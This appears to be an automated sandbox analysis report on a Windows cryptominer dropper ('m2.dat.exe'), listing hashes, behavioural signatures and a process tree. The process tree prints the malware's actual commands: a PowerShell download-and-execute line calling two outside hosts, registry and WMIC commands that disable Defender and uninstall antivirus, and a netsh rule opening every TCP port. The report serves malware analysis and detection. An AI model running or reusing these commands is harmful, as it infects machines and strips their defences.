Analysis
-
max time kernel
123s -
max time network
118s -
platform
windows7_x64 -
resource
win7-en-20211014 -
submitted
01-12-2021 18:08
Static task
static1
Behavioral task
behavioral1
Sample
m2.dat.exe
Resource
win7-en-20211014
General
-
Target
m2.dat.exe
-
Size
3.4MB
-
MD5
fcfc0feed527d188d6b2ed3445758511
-
SHA1
b4198d332b59b303e2dc5df717f2cf408b308f28
-
SHA256
28e5812c8bff42c348a5f25a5f3d871c5b3bbda882da1009db4d25dc974bef0c
-
SHA512
af053c75e89e18573161dcd1fcabc3b08998874c5e810bc15bb2a0e5ab0254d06b4ec6defc545fc9dff4fcb94529eb9ea7610ad63233e5d6e191b232c502d3c5
Malware Config
Extracted
http://k2ygoods.ydns.eu/power.txt
Signatures
-
XMRig Miner Payload 3 IoCs
Processes:
resource yara_rule \Windows\debug\m\winlogon.exe xmrig C:\Windows\debug\m\winlogon.exe xmrig C:\Windows\debug\m\winlogon.exe xmrig -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 7 1688 powershell.exe -
Executes dropped EXE 6 IoCs
Processes:
lsass.exe1sass.exelsass.exe1sass.exewinlogon.execsrss.exepid process 2024 lsass.exe 2040 1sass.exe 1916 lsass.exe 1736 1sass.exe 844 winlogon.exe 908 csrss.exe -
Modifies Windows Firewall 1 TTPs
-
Stops running service(s) 3 TTPs
-
Loads dropped DLL 5 IoCs
Processes:
cmd.exelsass.exe1sass.exepid process 924 cmd.exe 924 cmd.exe 1916 lsass.exe 1736 1sass.exe 1736 1sass.exe -
Drops file in Windows directory 25 IoCs
Processes:
m2.dat.exeattrib.exewinlogon.exeattrib.exeattrib.exedescription ioc process File created C:\Windows\debug\__tmp_rar_sfx_access_check_259401270 m2.dat.exe File created C:\Windows\debug\m\n.vbs m2.dat.exe File opened for modification C:\Windows\debug\m\lsass.exe m2.dat.exe File opened for modification C:\Windows\debug\m\winlogon.exe attrib.exe File created C:\Windows\debug\m\winlogon.exe m2.dat.exe File opened for modification C:\Windows\debug\m\config.json winlogon.exe File created C:\Windows\debug\m\config.json m2.dat.exe File opened for modification C:\Windows\debug\m m2.dat.exe File created C:\Windows\debug\m\server.reg m2.dat.exe File opened for modification C:\Windows\debug\m\WinRing0x64.sys m2.dat.exe File opened for modification C:\Windows\debug\m\server2.reg m2.dat.exe File opened for modification C:\Windows\debug\m\csrss.exe m2.dat.exe File opened for modification C:\Windows\debug\m\config.json attrib.exe File opened for modification C:\Windows\debug\m attrib.exe File opened for modification C:\Windows\debug\m\server.reg m2.dat.exe File created C:\Windows\debug\m\WinRing0x64.sys m2.dat.exe File opened for modification C:\Windows\debug\m\n.vbs m2.dat.exe File created C:\Windows\debug\m\c1.bat m2.dat.exe File created C:\Windows\debug\m\lsass.exe m2.dat.exe File opened for modification C:\Windows\debug\m\winlogon.exe m2.dat.exe File opened for modification C:\Windows\debug\m\config.json m2.dat.exe File created C:\Windows\debug\m\server2.reg m2.dat.exe File opened for modification C:\Windows\debug\m\c1.bat m2.dat.exe File created C:\Windows\debug\m\csrss.exe m2.dat.exe File opened for modification C:\Windows\debug\m\lsass.exe attrib.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
NETSTAT.EXEpid process 1480 NETSTAT.EXE -
Modifies data under HKEY_USERS 2 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80c3e166e6e6d701 powershell.exe -
Runs .reg file with regedit 2 IoCs
Processes:
regedit.exeregedit.exepid process 832 regedit.exe 1548 regedit.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
csrss.exepowershell.exe1sass.exelsass.exepid process 908 csrss.exe 908 csrss.exe 1688 powershell.exe 1688 powershell.exe 1736 1sass.exe 1736 1sass.exe 1736 1sass.exe 1736 1sass.exe 1736 1sass.exe 1916 lsass.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
winlogon.execsrss.exepowershell.exeWMIC.exemsiexec.exeWMIC.exeWMIC.exedescription pid process Token: SeLockMemoryPrivilege 844 winlogon.exe Token: SeDebugPrivilege 908 csrss.exe Token: SeDebugPrivilege 1688 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1408 WMIC.exe Token: SeIncreaseQuotaPrivilege 1408 WMIC.exe Token: SeSecurityPrivilege 1408 WMIC.exe Token: SeTakeOwnershipPrivilege 1408 WMIC.exe Token: SeLoadDriverPrivilege 1408 WMIC.exe Token: SeSystemtimePrivilege 1408 WMIC.exe Token: SeBackupPrivilege 1408 WMIC.exe Token: SeRestorePrivilege 1408 WMIC.exe Token: SeShutdownPrivilege 1408 WMIC.exe Token: SeSystemEnvironmentPrivilege 1408 WMIC.exe Token: SeUndockPrivilege 1408 WMIC.exe Token: SeManageVolumePrivilege 1408 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1408 WMIC.exe Token: SeIncreaseQuotaPrivilege 1408 WMIC.exe Token: SeSecurityPrivilege 1408 WMIC.exe Token: SeTakeOwnershipPrivilege 1408 WMIC.exe Token: SeLoadDriverPrivilege 1408 WMIC.exe Token: SeSystemtimePrivilege 1408 WMIC.exe Token: SeBackupPrivilege 1408 WMIC.exe Token: SeRestorePrivilege 1408 WMIC.exe Token: SeShutdownPrivilege 1408 WMIC.exe Token: SeSystemEnvironmentPrivilege 1408 WMIC.exe Token: SeUndockPrivilege 1408 WMIC.exe Token: SeManageVolumePrivilege 1408 WMIC.exe Token: SeRestorePrivilege 112 msiexec.exe Token: SeTakeOwnershipPrivilege 112 msiexec.exe Token: SeSecurityPrivilege 112 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1620 WMIC.exe Token: SeIncreaseQuotaPrivilege 1620 WMIC.exe Token: SeSecurityPrivilege 1620 WMIC.exe Token: SeTakeOwnershipPrivilege 1620 WMIC.exe Token: SeLoadDriverPrivilege 1620 WMIC.exe Token: SeSystemtimePrivilege 1620 WMIC.exe Token: SeBackupPrivilege 1620 WMIC.exe Token: SeRestorePrivilege 1620 WMIC.exe Token: SeShutdownPrivilege 1620 WMIC.exe Token: SeSystemEnvironmentPrivilege 1620 WMIC.exe Token: SeUndockPrivilege 1620 WMIC.exe Token: SeManageVolumePrivilege 1620 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1620 WMIC.exe Token: SeIncreaseQuotaPrivilege 1620 WMIC.exe Token: SeSecurityPrivilege 1620 WMIC.exe Token: SeTakeOwnershipPrivilege 1620 WMIC.exe Token: SeLoadDriverPrivilege 1620 WMIC.exe Token: SeSystemtimePrivilege 1620 WMIC.exe Token: SeBackupPrivilege 1620 WMIC.exe Token: SeRestorePrivilege 1620 WMIC.exe Token: SeShutdownPrivilege 1620 WMIC.exe Token: SeSystemEnvironmentPrivilege 1620 WMIC.exe Token: SeUndockPrivilege 1620 WMIC.exe Token: SeManageVolumePrivilege 1620 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1988 WMIC.exe Token: SeIncreaseQuotaPrivilege 1988 WMIC.exe Token: SeSecurityPrivilege 1988 WMIC.exe Token: SeTakeOwnershipPrivilege 1988 WMIC.exe Token: SeLoadDriverPrivilege 1988 WMIC.exe Token: SeSystemtimePrivilege 1988 WMIC.exe Token: SeBackupPrivilege 1988 WMIC.exe Token: SeRestorePrivilege 1988 WMIC.exe Token: SeShutdownPrivilege 1988 WMIC.exe Token: SeSystemEnvironmentPrivilege 1988 WMIC.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
winlogon.exepid process 844 winlogon.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
m2.dat.exeWScript.execmd.exelsass.exe1sass.execsrss.execmd.exedescription pid process target process PID 1968 wrote to memory of 1488 1968 m2.dat.exe WScript.exe PID 1968 wrote to memory of 1488 1968 m2.dat.exe WScript.exe PID 1968 wrote to memory of 1488 1968 m2.dat.exe WScript.exe PID 1968 wrote to memory of 1488 1968 m2.dat.exe WScript.exe PID 1488 wrote to memory of 924 1488 WScript.exe cmd.exe PID 1488 wrote to memory of 924 1488 WScript.exe cmd.exe PID 1488 wrote to memory of 924 1488 WScript.exe cmd.exe PID 1488 wrote to memory of 924 1488 WScript.exe cmd.exe PID 924 wrote to memory of 2024 924 cmd.exe lsass.exe PID 924 wrote to memory of 2024 924 cmd.exe lsass.exe PID 924 wrote to memory of 2024 924 cmd.exe lsass.exe PID 924 wrote to memory of 2024 924 cmd.exe lsass.exe PID 924 wrote to memory of 832 924 cmd.exe regedit.exe PID 924 wrote to memory of 832 924 cmd.exe regedit.exe PID 924 wrote to memory of 832 924 cmd.exe regedit.exe PID 924 wrote to memory of 832 924 cmd.exe regedit.exe PID 924 wrote to memory of 2040 924 cmd.exe 1sass.exe PID 924 wrote to memory of 2040 924 cmd.exe 1sass.exe PID 924 wrote to memory of 2040 924 cmd.exe 1sass.exe PID 924 wrote to memory of 2040 924 cmd.exe 1sass.exe PID 924 wrote to memory of 1548 924 cmd.exe regedit.exe PID 924 wrote to memory of 1548 924 cmd.exe regedit.exe PID 924 wrote to memory of 1548 924 cmd.exe regedit.exe PID 924 wrote to memory of 1548 924 cmd.exe regedit.exe PID 924 wrote to memory of 1164 924 cmd.exe sc.exe PID 924 wrote to memory of 1164 924 cmd.exe sc.exe PID 924 wrote to memory of 1164 924 cmd.exe sc.exe PID 924 wrote to memory of 1164 924 cmd.exe sc.exe PID 924 wrote to memory of 2032 924 cmd.exe sc.exe PID 924 wrote to memory of 2032 924 cmd.exe sc.exe PID 924 wrote to memory of 2032 924 cmd.exe sc.exe PID 924 wrote to memory of 2032 924 cmd.exe sc.exe PID 1916 wrote to memory of 844 1916 lsass.exe winlogon.exe PID 1916 wrote to memory of 844 1916 lsass.exe winlogon.exe PID 1916 wrote to memory of 844 1916 lsass.exe winlogon.exe PID 924 wrote to memory of 1228 924 cmd.exe attrib.exe PID 924 wrote to memory of 1228 924 cmd.exe attrib.exe PID 924 wrote to memory of 1228 924 cmd.exe attrib.exe PID 924 wrote to memory of 1228 924 cmd.exe attrib.exe PID 1736 wrote to memory of 908 1736 1sass.exe csrss.exe PID 1736 wrote to memory of 908 1736 1sass.exe csrss.exe PID 1736 wrote to memory of 908 1736 1sass.exe csrss.exe PID 924 wrote to memory of 1112 924 cmd.exe attrib.exe PID 924 wrote to memory of 1112 924 cmd.exe attrib.exe PID 924 wrote to memory of 1112 924 cmd.exe attrib.exe PID 924 wrote to memory of 1112 924 cmd.exe attrib.exe PID 908 wrote to memory of 1156 908 csrss.exe cmd.exe PID 908 wrote to memory of 1156 908 csrss.exe cmd.exe PID 908 wrote to memory of 1156 908 csrss.exe cmd.exe PID 924 wrote to memory of 1768 924 cmd.exe attrib.exe PID 924 wrote to memory of 1768 924 cmd.exe attrib.exe PID 924 wrote to memory of 1768 924 cmd.exe attrib.exe PID 924 wrote to memory of 1768 924 cmd.exe attrib.exe PID 1156 wrote to memory of 1688 1156 cmd.exe powershell.exe PID 1156 wrote to memory of 1688 1156 cmd.exe powershell.exe PID 1156 wrote to memory of 1688 1156 cmd.exe powershell.exe PID 924 wrote to memory of 1300 924 cmd.exe attrib.exe PID 924 wrote to memory of 1300 924 cmd.exe attrib.exe PID 924 wrote to memory of 1300 924 cmd.exe attrib.exe PID 924 wrote to memory of 1300 924 cmd.exe attrib.exe PID 924 wrote to memory of 1484 924 cmd.exe netsh.exe PID 924 wrote to memory of 1484 924 cmd.exe netsh.exe PID 924 wrote to memory of 1484 924 cmd.exe netsh.exe PID 924 wrote to memory of 1484 924 cmd.exe netsh.exe -
Views/modifies file attributes 1 TTPs 4 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exepid process 1300 attrib.exe 1228 attrib.exe 1112 attrib.exe 1768 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\m2.dat.exe"C:\Users\Admin\AppData\Local\Temp\m2.dat.exe"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\debug\m\n.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\debug\m\c1.bat" "3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\debug\m\lsass.exelsass.exe install "Windows Updata" winlogon.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\regedit.exeC:\Windows\regedit /s server.reg4⤵
- Runs .reg file with regedit
-
C:\PerfLogs\Admin\1sass.exeC:\PerfLogs\Admin\1sass.exe install "Windows Management" C:\PerfLogs\Admin\csrss.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\regedit.exeC:\Windows\regedit /s server2.reg4⤵
- Runs .reg file with regedit
-
C:\Windows\SysWOW64\sc.exesc start "Windows Updata"4⤵
-
C:\Windows\SysWOW64\sc.exesc start "Windows Management"4⤵
-
C:\Windows\SysWOW64\attrib.exeattrib C:\Windows\debug\m +h +a4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib C:\Windows\debug\m\*.json +h +a +s +r4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib C:\Windows\debug\m\*.exe +h +a +s +r4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeattrib C:\PerfLogs\Admin\*.exe +h +a +s +r4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow4⤵
-
C:\Windows\debug\m\lsass.exeC:\Windows\debug\m\lsass.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\debug\m\winlogon.exe"winlogon.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\PerfLogs\Admin\1sass.exeC:\PerfLogs\Admin\1sass.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\PerfLogs\Admin\csrss.exe"C:\PerfLogs\Admin\csrss.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c "powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://k2ygoods.ydns.eu/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://2652435.f3322.org/power.txt')"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://k2ygoods.ydns.eu/power.txt')4⤵
- Blocklisted process makes network request
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /d 1 /t REG_DWORD /f5⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" product where "name like '%Eset%'" call uninstall /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" product where "name like '%%Kaspersky%%'" call uninstall /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" product where "name like '%avast%'" call uninstall /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" product where "name like '%avp%'" call uninstall /nointeractive5⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" product where "name like '%Security%'" call uninstall /nointeractive5⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" product where "name like '%AntiVirus%'" call uninstall /nointeractive5⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" product where "name like '%Norton Security%'" call uninstall /nointeractive5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart5⤵
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -ano5⤵
- Gathers network information
-
C:\Windows\system32\findstr.exe"C:\Windows\system32\findstr.exe" TCP5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" stop "Windows Updata"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" delete "Windows Updata"5⤵
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" stop "Windows Management"5⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\PerfLogs\Admin\1sass.exeMD5
beceae2fdc4f7729a93e94ac2ccd78cc
SHA147c112c23c7bdf2af24a20bd512f91ff6af76bc6
SHA256f689ee9af94b00e9e3f0bb072b34caaf207f32dcb4f5782fc9ca351df9a06c97
SHA512073f5ae0d4ffedb5edb3b92b8e19bea2c482a3ad7ab02ed71955d3e55aa44a297307fe4334d28c6f7683cb02d40b4313e560c9049507b16a8c5d6ee0a0f0071f
-
C:\PerfLogs\Admin\1sass.exeMD5
beceae2fdc4f7729a93e94ac2ccd78cc
SHA147c112c23c7bdf2af24a20bd512f91ff6af76bc6
SHA256f689ee9af94b00e9e3f0bb072b34caaf207f32dcb4f5782fc9ca351df9a06c97
SHA512073f5ae0d4ffedb5edb3b92b8e19bea2c482a3ad7ab02ed71955d3e55aa44a297307fe4334d28c6f7683cb02d40b4313e560c9049507b16a8c5d6ee0a0f0071f
-
C:\PerfLogs\Admin\1sass.exeMD5
beceae2fdc4f7729a93e94ac2ccd78cc
SHA147c112c23c7bdf2af24a20bd512f91ff6af76bc6
SHA256f689ee9af94b00e9e3f0bb072b34caaf207f32dcb4f5782fc9ca351df9a06c97
SHA512073f5ae0d4ffedb5edb3b92b8e19bea2c482a3ad7ab02ed71955d3e55aa44a297307fe4334d28c6f7683cb02d40b4313e560c9049507b16a8c5d6ee0a0f0071f
-
C:\PerfLogs\Admin\csrss.exeMD5
62e98ca6b2bf484e6fbbc537fd49167a
SHA1b8fbfaaeadb02dde6461132bf63a9faa4a89987e
SHA256cbc85816ce4d841628d343113b3ae6843402062835a9da85da1064f58e840517
SHA512684cd2a043b71b288a515a8df26e4f374afcec9de9cdb6d80068e24f6eeea7adf9c141e6df172ec4cb2a09edbf3da2a9e0120ff8a086800c52f5c7cc998799d8
-
C:\PerfLogs\Admin\csrss.exeMD5
62e98ca6b2bf484e6fbbc537fd49167a
SHA1b8fbfaaeadb02dde6461132bf63a9faa4a89987e
SHA256cbc85816ce4d841628d343113b3ae6843402062835a9da85da1064f58e840517
SHA512684cd2a043b71b288a515a8df26e4f374afcec9de9cdb6d80068e24f6eeea7adf9c141e6df172ec4cb2a09edbf3da2a9e0120ff8a086800c52f5c7cc998799d8
-
C:\Windows\debug\m\c1.batMD5
9a412e42384f31ad8c61cbd32076603c
SHA17a1caef46f6c7549ab17d98f1328fff4673cacb2
SHA2560ab85d2da0f7a9b644d4b7a964a7b1728d1f9eb716b9abe2f1d9c611d7ee4617
SHA5121d9d179db2a8901539f3a7fe6a91d58422cdb6a28dbf53e758e8745881a45304b0037227b9a4d1c04928d14b0014a1bb1c2e6eb53dfa43111eba6bf32da949c6
-
C:\Windows\debug\m\config.jsonMD5
c3b273d977023f0309fa7225c73911ed
SHA1b667780303d60c649a77e8c2fed970779d8a53cf
SHA2563896eedd2bceeca958779c63c3150744c9e2d0160553b4d8a652323fe2b3b5df
SHA51238e8e637c58e59577a5e05e05fb6818ccba96b8db2cfda9e8221e1a0665429a321dc3efe603aa37afed7165267060382b213136076ebe3b4c536c8f060f026ea
-
C:\Windows\debug\m\config.jsonMD5
62fc8627fd89578bbf0d4dad13d010ce
SHA1d58965556828a215684cac6271a88472a37e74f9
SHA2565b70dcc71733725215b752a09c7434495554cd0183001af02fda4528425bbdf9
SHA512d9596a95e6cd13f745d618fd9865e50a3e04df26d780e4d6c6c9d3d2cac3b825258cb2c80a71922fca099d90605d4dd9de5ed6b91ac324efc3a966e3f43decc9
-
C:\Windows\debug\m\csrss.exeMD5
62e98ca6b2bf484e6fbbc537fd49167a
SHA1b8fbfaaeadb02dde6461132bf63a9faa4a89987e
SHA256cbc85816ce4d841628d343113b3ae6843402062835a9da85da1064f58e840517
SHA512684cd2a043b71b288a515a8df26e4f374afcec9de9cdb6d80068e24f6eeea7adf9c141e6df172ec4cb2a09edbf3da2a9e0120ff8a086800c52f5c7cc998799d8
-
C:\Windows\debug\m\lsass.exeMD5
beceae2fdc4f7729a93e94ac2ccd78cc
SHA147c112c23c7bdf2af24a20bd512f91ff6af76bc6
SHA256f689ee9af94b00e9e3f0bb072b34caaf207f32dcb4f5782fc9ca351df9a06c97
SHA512073f5ae0d4ffedb5edb3b92b8e19bea2c482a3ad7ab02ed71955d3e55aa44a297307fe4334d28c6f7683cb02d40b4313e560c9049507b16a8c5d6ee0a0f0071f
-
C:\Windows\debug\m\lsass.exeMD5
beceae2fdc4f7729a93e94ac2ccd78cc
SHA147c112c23c7bdf2af24a20bd512f91ff6af76bc6
SHA256f689ee9af94b00e9e3f0bb072b34caaf207f32dcb4f5782fc9ca351df9a06c97
SHA512073f5ae0d4ffedb5edb3b92b8e19bea2c482a3ad7ab02ed71955d3e55aa44a297307fe4334d28c6f7683cb02d40b4313e560c9049507b16a8c5d6ee0a0f0071f
-
C:\Windows\debug\m\lsass.exeMD5
beceae2fdc4f7729a93e94ac2ccd78cc
SHA147c112c23c7bdf2af24a20bd512f91ff6af76bc6
SHA256f689ee9af94b00e9e3f0bb072b34caaf207f32dcb4f5782fc9ca351df9a06c97
SHA512073f5ae0d4ffedb5edb3b92b8e19bea2c482a3ad7ab02ed71955d3e55aa44a297307fe4334d28c6f7683cb02d40b4313e560c9049507b16a8c5d6ee0a0f0071f
-
C:\Windows\debug\m\n.vbsMD5
c4258287aa2aa93135e6d1462b1cd58f
SHA116bdfae57a969931d2b7321dd48ec39dfbe8be14
SHA256cf8417cdc951eed2c10d424b312a0fbf222321e785e655548d9b054a2d87c273
SHA51238c701c8f50d35dd8319755d65e74849150bc3402afe2994a0eea9209ffde193ca6301ff28ad4e8b5ddb4cdd916f9a0e7ef4ef7e4e9c8b82ae28a2a3e76d75ba
-
C:\Windows\debug\m\server.regMD5
7c2301b0fa96dac6f800704acca36342
SHA1d5733429c9acee4e452bae53499fa67309beb855
SHA256f9f8291c7d3f5397e249aa6ec402ebc45d47cf455b25588970382048aa67b985
SHA512f754c1b848ff6eef49d60096c3a79a9120ddde80d812be2b6b751745cd008c3f2ffd0c82de23852a9153258d43ef8de7e1e30f4598a557ff7809ae476a75922f
-
C:\Windows\debug\m\server2.regMD5
41678ca725e5e2964ccfebde111d243a
SHA1451890c89b9268a321831ae0ca17cf128c973c2a
SHA2561b74416ba48010dad0467ce77f8d1044e75be2dd003a18cdad0d6f2112e3b565
SHA512b916c1321f4073da734c31bd6a50f1abb95592a4782977f09d73b986b867a3599f348bfbd3641d204a1882f4e3e84be7eb7254d5e4049e45279088172ab8ddad
-
C:\Windows\debug\m\winlogon.exeMD5
14404f2edef3c43d318fa8cab21b0ea6
SHA14f86639fd543555ba4604e0acb28c8631fe9c300
SHA25665127ac2b7fcda847872fa2314d4ef34620efc6d585551cebf2d4886d657c736
SHA512fccd70f3b3162a7f5f1d48fe0066ae0126bfbec92d51eb8b767db2d43ea919e9de9aa292013fc311503c2f567d1884143e08420048321ac0447771c3ad368624
-
C:\Windows\debug\m\winlogon.exeMD5
14404f2edef3c43d318fa8cab21b0ea6
SHA14f86639fd543555ba4604e0acb28c8631fe9c300
SHA25665127ac2b7fcda847872fa2314d4ef34620efc6d585551cebf2d4886d657c736
SHA512fccd70f3b3162a7f5f1d48fe0066ae0126bfbec92d51eb8b767db2d43ea919e9de9aa292013fc311503c2f567d1884143e08420048321ac0447771c3ad368624
-
\PerfLogs\Admin\1sass.exeMD5
beceae2fdc4f7729a93e94ac2ccd78cc
SHA147c112c23c7bdf2af24a20bd512f91ff6af76bc6
SHA256f689ee9af94b00e9e3f0bb072b34caaf207f32dcb4f5782fc9ca351df9a06c97
SHA512073f5ae0d4ffedb5edb3b92b8e19bea2c482a3ad7ab02ed71955d3e55aa44a297307fe4334d28c6f7683cb02d40b4313e560c9049507b16a8c5d6ee0a0f0071f
-
\PerfLogs\Admin\csrss.exeMD5
62e98ca6b2bf484e6fbbc537fd49167a
SHA1b8fbfaaeadb02dde6461132bf63a9faa4a89987e
SHA256cbc85816ce4d841628d343113b3ae6843402062835a9da85da1064f58e840517
SHA512684cd2a043b71b288a515a8df26e4f374afcec9de9cdb6d80068e24f6eeea7adf9c141e6df172ec4cb2a09edbf3da2a9e0120ff8a086800c52f5c7cc998799d8
-
\PerfLogs\Admin\csrss.exeMD5
62e98ca6b2bf484e6fbbc537fd49167a
SHA1b8fbfaaeadb02dde6461132bf63a9faa4a89987e
SHA256cbc85816ce4d841628d343113b3ae6843402062835a9da85da1064f58e840517
SHA512684cd2a043b71b288a515a8df26e4f374afcec9de9cdb6d80068e24f6eeea7adf9c141e6df172ec4cb2a09edbf3da2a9e0120ff8a086800c52f5c7cc998799d8
-
\Windows\debug\m\lsass.exeMD5
beceae2fdc4f7729a93e94ac2ccd78cc
SHA147c112c23c7bdf2af24a20bd512f91ff6af76bc6
SHA256f689ee9af94b00e9e3f0bb072b34caaf207f32dcb4f5782fc9ca351df9a06c97
SHA512073f5ae0d4ffedb5edb3b92b8e19bea2c482a3ad7ab02ed71955d3e55aa44a297307fe4334d28c6f7683cb02d40b4313e560c9049507b16a8c5d6ee0a0f0071f
-
\Windows\debug\m\winlogon.exeMD5
14404f2edef3c43d318fa8cab21b0ea6
SHA14f86639fd543555ba4604e0acb28c8631fe9c300
SHA25665127ac2b7fcda847872fa2314d4ef34620efc6d585551cebf2d4886d657c736
SHA512fccd70f3b3162a7f5f1d48fe0066ae0126bfbec92d51eb8b767db2d43ea919e9de9aa292013fc311503c2f567d1884143e08420048321ac0447771c3ad368624
-
memory/512-119-0x0000000000000000-mapping.dmp
-
memory/572-116-0x0000000000000000-mapping.dmp
-
memory/696-114-0x0000000000000000-mapping.dmp
-
memory/768-108-0x0000000000000000-mapping.dmp
-
memory/832-64-0x0000000000000000-mapping.dmp
-
memory/844-80-0x0000000000000000-mapping.dmp
-
memory/844-104-0x0000000000C80000-0x0000000000CA0000-memory.dmpFilesize
128KB
-
memory/844-105-0x0000000000CA0000-0x0000000000CC0000-memory.dmpFilesize
128KB
-
memory/844-83-0x0000000000110000-0x0000000000130000-memory.dmpFilesize
128KB
-
memory/908-87-0x0000000000000000-mapping.dmp
-
memory/924-60-0x0000000000000000-mapping.dmp
-
memory/1112-90-0x0000000000000000-mapping.dmp
-
memory/1156-91-0x0000000000000000-mapping.dmp
-
memory/1164-75-0x0000000000000000-mapping.dmp
-
memory/1188-117-0x0000000000000000-mapping.dmp
-
memory/1228-81-0x0000000000000000-mapping.dmp
-
memory/1252-113-0x0000000000000000-mapping.dmp
-
memory/1300-96-0x0000000000000000-mapping.dmp
-
memory/1408-109-0x0000000000000000-mapping.dmp
-
memory/1480-118-0x0000000000000000-mapping.dmp
-
memory/1484-122-0x0000000000000000-mapping.dmp
-
memory/1484-98-0x0000000000000000-mapping.dmp
-
memory/1488-56-0x0000000000000000-mapping.dmp
-
memory/1548-72-0x0000000000000000-mapping.dmp
-
memory/1620-111-0x0000000000000000-mapping.dmp
-
memory/1628-121-0x0000000000000000-mapping.dmp
-
memory/1660-115-0x0000000000000000-mapping.dmp
-
memory/1688-102-0x00000000011D2000-0x00000000011D4000-memory.dmpFilesize
8KB
-
memory/1688-99-0x000007FEFB6C1000-0x000007FEFB6C3000-memory.dmpFilesize
8KB
-
memory/1688-101-0x00000000011D0000-0x00000000011D2000-memory.dmpFilesize
8KB
-
memory/1688-103-0x00000000011D4000-0x00000000011D7000-memory.dmpFilesize
12KB
-
memory/1688-106-0x00000000011DB000-0x00000000011FA000-memory.dmpFilesize
124KB
-
memory/1688-94-0x0000000000000000-mapping.dmp
-
memory/1688-100-0x000007FEF1DF0000-0x000007FEF294D000-memory.dmpFilesize
11.4MB
-
memory/1768-93-0x0000000000000000-mapping.dmp
-
memory/1968-55-0x0000000075F41000-0x0000000075F43000-memory.dmpFilesize
8KB
-
memory/1988-112-0x0000000000000000-mapping.dmp
-
memory/2024-62-0x0000000000000000-mapping.dmp
-
